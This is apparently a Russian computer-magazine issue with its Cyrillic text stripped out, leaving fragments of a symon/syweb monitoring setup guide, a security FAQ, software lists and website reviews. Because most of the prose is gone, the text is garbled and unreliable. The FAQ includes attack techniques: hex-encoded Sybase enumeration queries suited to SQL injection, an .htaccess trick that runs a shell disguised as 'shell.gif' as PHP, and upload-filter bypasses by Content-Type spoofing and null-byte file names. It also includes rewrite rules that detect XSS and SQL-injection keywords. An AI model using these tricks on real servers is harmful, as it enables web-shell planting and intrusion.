datadir "/var/www/symon/rrds/localhost"
#
# write sensor(lm0.fan1) in "/var/www/symon/rrds/localhost/sensor_lm0.fan0.rrd"
}


# cd /usr/local/share/symon/
# ./c_smrrds.sh all

. :
# /usr/local/libexec/symux -t
/etc/symux.conf: ok

, symux :
# vi /etc/rc.local
if [ -x /usr/local/libexec/symux ]; then
echo 'starting symux'; /usr/local/libexec/symux
fi

, symon, .
, -l ,
.
, -d.
# /usr/local/libexec/symux -d

>> SYN/ACK

links

Symon www.xs4all.nl/~wpd/symon.

- ,
( Free/OpenBSD
www):


phpSymon www.ryanflannery.net/works/phpsymon.

# chown -R www:www /var/www/syweb/


# chown -R www:www /var/www/symon/

phpSymon

debug: rrdupdate /var/www/symon/rrds/localhost/df_sd0e.rrd 1233494631:15630616:8801288:8801288:0:0:0:0

. - .


, .
( SymuxClient.pm getsymonitem.pl)
/usr/local/share/symon/client.
;
:
./getsymonitem.pl <symux host> <symux port> <measured host> <stream> <item>
# cd /usr/local/share/symon/client
# ./getsymonitem.pl 127.0.0.1 2100 127.0.0.1 'cpu(0)' user
12.80

man 8 symux. CPU : user, nice,


system, interrupt, idle.
, PHP, syweb phpSymon.
Apache + PHP,
, . syweb:
# wget -c http://www.xs4all.nl/~wpd/symon/philes/syweb-0.58.tar.gz
# tar zxf syweb-0.58.tar.gz

htdocs symon
DocumentRoot -:
# cd syweb
# cp -rv htdocs/syweb /var/www
# cp -rv symon /var/www

syweb/setup.inc .
Free/OpenBSD ( chroot ):
# vi /var/www/syweb/setup.inc
$symon['rrdtool_path']='/usr/local/bin/rrdtool';
$symon['cache_dir']='/var/www/symon/cache';
$symon['host_tree']='/var/www/symon/rrds';
$symon['layout_dir']='/var/www/symon';

,
:

video


,
,
symon
.

# mkdir /var/www/symon/cache
# chown www:www /var/www/symon/cache

- chroot, , install_rrdtool.sh,
rrd chroot-.
, http://localhost/syweb
. , .
PF.
,
.htaccess:
# vi /var/www/syweb/.htaccess
AuthName "Syweb zone"
AuthType Basic
AuthUserFile /usr/local/etc/apache/httpd_access
require valid-user

htpasswd,
Apache:
# htpasswd -c /usr/local/etc/apache/httpd_access admin

, Symon ,
. z

info
proc
ps,

ifconfig,

fdisk dmesg.


,


sysctl hw.sensors.

RRDTool

(z_11_2008).


>> units
CORWIN

STEP

/ CORWIN88@MAIL.RU /

FAQ UNITED:

Q: Sybase , INFORMATION.SCHEMA.Tables(columns)?
A: Sybase sysobjects.
.
( ,
,
) select name from bd..
sysobjects where type=U. bd ,
. U ,
,
. ,
hex- U 0x55. (...)
where type=0x55.
Q: ?
A: : select dbname
from master..syslogins.
select dbname from master..syslogins
where dbname not in (_hex__ __).
,
, hex.
: select dbname from master..syslogins
where dbname not in (db1___hex,db2_
__hex,...). :

select dbname from master..syslogins where dbname not in (0x646231,0x64626e616d6532,...).
Q:
MD5-.
?
A: , , . http://hashchecker.com.
: (50 )
$15, (100 ) $25.
Rainbow ( , 196 16 DVD
$500).
Q: .

?
A:
John The Ripper Distributed John
(http://freshmeat.net/projects/djohn).
Q: WEP
Windows Mobile?
A: WMobile monitor
mode, WiFi-
.

Q: .htaccess -
( IP-
)?
A: Ronald van den Heetkamp
:
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (|%22).*(>|%3E|<|%3C).* [NC]
RewriteRule ^(.*)$ log.php [NC]
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC]
RewriteRule ^(.*)$ log.php [NC]
RewriteCond %{QUERY_STRING} (javascript:).*(;).* [NC]
RewriteRule ^(.*)$ log.php [NC]
RewriteCond %{QUERY_STRING} (;|'|"|%22).*(union|select|insert|drop|update|md5|benchmark|or|and|if).* [NC]
RewriteRule ^(.*)$ log.php [NC]
RewriteRule (,|;|<|>|'|`) /log.php [NC]

>> units

Q: PHP
-,
( ).
?
A: ,
PHP :). ,

. ,

HTTP.
. .
Q: SSH?
A:
ip-,

. BlockSSHD (http://blocksshd.sourceforge.net). , .
(/etc/blocksshd/blocksshd.conf)
:
max_attempts => '4'
// ;
unblock => '1'
// , ip ;
send_email => '1'
// email (0 );
email => 'mymail@mail.com'
// email;
email_whois_lookup => '0'
//
whois email;
:
-d | --daemon | --start
//
--stop
-h | --help
-v | --version
Q: ,
. ,

php, perl cgi.
-?
A: , . -, , gif, .htaccess :
<Files shell.gif>
AddType application/x-httpd-php .gif
</Files>
, .

Q: , ,
- , ?
A:
.
(
).
,
cgi
(
,
, ). Content-Type.
:
<?php
if ($_FILES['userfile']['type'] != "image/gif") {
    echo 'Error!';
    exit;
}

, Content-Type:
text/plain, MIME-
.
Content-Type:
image/gif.
move_uploaded_file
copy. -, ,
null- (%00, \x00). ,
, , :
<?php
//
if ($allowed)
{
    //
    move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile);
    echo 'Uploaded!';
}
else {
    echo 'Error!';
}
?>
php-,
, null- (shell.php%00.jpg),
.
, -
getimagesize. getimagesize()
GIF, JPG,
PNG, SWF, PSD, TIFF BMP , /.
, :

<?php
$imageinfo = getimagesize($_FILES['userfile']['tmp_name']);
if ($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg') {
    echo 'Error!';
    exit;
}
//
?>
, EXIF-
(,

, ACDSee ..)
-, php,
Content-Type
.
,
.
Q:
?
A: ,
base64
. ,
XOR- .
, ,
, .
. Suhosin (http://hardenedphp.net/suhosin),
:
sql-injection
cookie

eval()
preg_replace /e
phpinfo()


null-byte
HTTP
Response Splitting
?
suhosin!
,
; ,
..


>> units

Q: XSS
cookies. ?
A: , , ,


.
Q: CMS, -, . . ?
A: Register_
globals. -
, .
,
,
,
.
. ,
:). ,

, advisory (

).
Q:
. ,
:
. , 3G-,
Samsung WiMax
Yota.
, , ,
.
Ubuntu?
A: , ,
, madwimax
(http://code.google.com/p/madwimax). ,
-
Linux- Samsung SWC-U200 USB Mobile Wimax.
user-space,
,
libusb-1.0.
:
Linux, .
?
:
1. :
sudo path/to/wimax
.
State: NORMAL, :


. 3.
2. :
sudo ifconfig tap0 up

3. :
sudo dhclient tap0
.
, .

habrahabr.ru/blogs/WiMAX/50504.
Q:
,
Linux?
A: ! ,
Windows XP:
1.
USB, , VirtualBox (www.
virtualbox.org).
2.
.
3.
:
sudo tunctl -t tap0 -u zero
sudo ifconfig tap0 192.168.0.1 up
sudo chmod 0666 /dev/net/tun

4. VirtualBox , host interface tap0.


5. .
6. XP
IP: ,
192.168.0.1.
7.
proxy-. SmallProxy
(smallproxy.ru).
8. USB- ,
, .
9.
Yota.
10.

192.168.0.1:3128.
Q: RSS-
( Google Reader)
. ,
,
friends only.
?
A: .
,
,
RSS-.
Yahoo Pipes

(pipes.yahoo.com),
. ,
?
,
RSS Proxy (http://rss-proxy.darkk.
net.ru).
RSS-,
,
. ,
, : http://github.com/darkk/rss-proxy.
Q: SMS- XMPP
(Jabber)?
A:
,
XMPP. , ,
. :

,
Python Clickatell Bulk SMS
Gateway (www.clickatell.com),
IP. MessagingBay (http://
www.messagingbay.com),
. ( , ) .
, , .
? :
1. Mail.ru.
2. jabber- mail.ru jabber.ru.
3. jabbera ,

SMS.
: 50
:).
Q: , ][
RIA-.

,
?
A: . Adobe
Labs
Distributable Player (http://labs.adobe.com/technologies/distributableplayer), ,
, RIA-
.
:
Flash Lite 3.1 Distributable Player.
.
Adobe Mobile Packager. , SWF - Windows Mobile
Symbian S60.

! z

>Multimedia
aTunes 1.12.0 Solano
GIMP for Windows 2.6.5
ICY Radio 0.5
MorphVOX Junior 2.7.2
MorphVOX Pro - Voice Changer 4.2.8
Open Subtitle Editor 0.1.2
Picasa 3
Songbird 1.0

>Misc
BatteryBar v3.1 Beta
Executor 0.98.56
Eyes Relax 0.44
Fast Duplicate File Finder 1.1.0.0
FruitfulTime ProductivityMeter
HoeKey 1.13
KGB Archiver 2
KSoft's SmartUp Menu 0.1.1
Mac Finder Toolbar for Windows
0.3.2
Plates 1.10
RBTray 3.3
SpellChecker 2.1.0.115
Synergy 1.3.1
The Guide 2.0
timeEdition 1.1.4
TNR CodeExpert
TNR MoonLight -
1.3.46
Visual Task Tips 3.4

>Development
Carbide ++ 2.0
Groovy 1.6
HTTP Debugger Pro 3.2
IntelliJ IDEA 8.1
MySQL GUI Tools 5.0-r17
Perl Dev Kit (PDK) 8.0.0.289618
RJ TextEd 4.81
S60 Platform SDK
VB Decompiler 7.1

>>WINDOWS
>Dailysoft
7-Zip 4.65
Autoruns 9.37
DAEMON Tools Lite 4.30.3
Download Master 5.5.9.1157
FarPowerPack 1.15
FileZilla Client 3.2.2.1
IrfanView 4.23
JDataSaver
K-Lite Mega Codec Pack 4.7.0
Miranda IM 0.7.17
Mozilla Firefox 3.0.6
Notepad++ 5.2
Opera 9.64
PuTTY 0.60
QIP Infium RC4, Build 9026
Skype 4.0
Total Commander 7.04a
Unlocker 1.8.7
Winamp 5.55
Xakep CD DataSaver 5.2

>>UNIX
Desktop
Day Planner 0.9.2
Kino 1.3.3
PeaZip 2.5
Bash 4.0
Keryx 0.92
GIMP 2.6.5
PinkyTagger 2.2
MC 4.6.2
Compiz 0.8.0
OpenOffice 3.0.1
man-pages 3.19
Mkvtoolnix 2.5.1
GWhere 0.2.3
AcetoneISO 2.0.3

>System
Easy AutoInstaller 2.1
Gizmo Central 2.7.3
HD Tune Pro 3.50
InstallPad 0.4
Nero BackItUp 4
Secunia Personal Software Inspector
1.0.0.3
SyncBackPro 5.3.0.18
Vombato Mail Drive 1.3

>Security
Attack Testing Platform
BtProx 1.3.4
CryptoTunnel 2.0
DShield Web honeypot Alpha
FlowMatrix
HookExplorer
IBM Rational AppScan Standard
Edition V7.8
KeePass 1.15
Malcode Analysys Pack
MultiPlot
PTSecurity Microsoft Patches
Network Scanner
Rising Internet Security 2009
21.22.30
SSA 1.2
Sunbelt Network Security Inspector
1.6.52
SysAnalyzer
Xspider 7.7.3100

>Net
BitKinex 3.0.9
Digsby Build 49
Dropbox 0.6.402
GhostWall FireWall 1.150
MyConnection PC 3.0b
PC Tools Firewall Plus 5
Safari 4beta
toonel.net 0.0.50.50
WinGate 6.5.2
Zimbra Desktop 1.0

Sweet Home 3D 1.6


VirtualDub 1.9.0
ZS4 Video Editor 0.958

>Security
AIM Sniff 1.0b
Aircrack-ng 1.0 rc2
Arpalert 2.0.11
Chkrootkit 0.48
Ettercap 0.7.3
GreenSQL 0.9.4
John the Ripper 1.7.3.1
Kismet 2008.05-R1
Nmbscan 1.2.5

>Net
aria2 1.2.0
Arora 0.5
Darkstat 3.0.711
FileZilla 3.2.2
Firefox 3.0.6
KTorrent 3.2
Liferea 1.4.26
Miro 2.0
Opera 9.63
Quassel 0.4.0
qutIM 0.1.99
Skype 2.0.072
streamtuner2 1.9.8
Transmission 1.51
Tucan 0.3.4

>Games
Pingus 0.7.2
World of Goo 1.4.0

>Devel
Automake 1.10.2
Bespin
Biew 5.7.3.1
Boost 1.38.0
Eric 4.3.0
Fingerprint Verification System 0.1.0
GCC 4.3.3
Glade 3.4.0
Google Web Toolkit 1.5.3
Groovy 1.6
GTK+ 2.14.7
haXe 2.02
IntellijIDEA 8.1
Libjpeg 6b
Moonlight 1.0
Navicat 8.0.28
Qt 4.4.3
Ruby 1.9.1
zlib 1.2.3

Picasa 3.0 beta


:
Amora 1.1
Cibyl 2.0
Gammu+ 0.40
gnokii 0.6.27
j2megl 0.0.7
Moccatroller 1.8
obexfs 0.11
SieFS 0.5
SMSTerm 0.6.1
Wammu 0.29

>X-distr
Debian 5.0 Lenny

>System
Bootchart 0.9
FreeRemote 0.1.3
Likewise Open 5.1.0
Linux Kernel 2.6.28.7
NVClock 0.8
nVidia Linux Display Driver x86
180.35
Parted Magic 3.7
RPM 4.6.0
Shake 0.99
SmbSync 1.0
System Rescue CD 1.1.5
VirtualBox 2.1.4
Wine 1.1.16

>Server
Bind 9.6.0
Cups 1.4
DBMail 2.3.5
Dhcp 4.1.0
DSPAM 3.8.0
FreeRemoted 0.14
Jabberd 2.2.7.1
NSD 3.2.1
OpenLDAP 2.4.15
OpenSSH 5.2
Postfix 2.5.6
Sarg 2.2.5
Sendmail 8.14.3
Snort 2.8.3.2
SQUID 3.0 STABLE13
Yaass Project 0.8.9
Ziproxy 2.6.9

OpenStego 0.5.1
p0f 2.0.8
Pam_usb 0.4.2
sqlmap 0.6.4
Sshguard 1.4rc2
THC-Amap 5.2
THC-Hydra 5.4
THC-pptp-bruter 0.1.4


WWW2
2


TORRENT-

OPENTRACKERS
WWW.OPENTRACKERS.FR


-. , ( ). , ,
.
opentrackers.
RSS.

WAKOOPA
WAKOOPA.COM

, ,
, Warcraft
III, .
. :). , ,
, ,
.



IT-

IT MANAGER 3
ITMANAGER3.INTEL.COM

, , .
IT Manager Intel IT-. , IT- ,

.

SKYFEX
SKYFEX.COM


. , - ActiveX
Internet Explorer, :
, . , SkyFex
.
SOS, . , .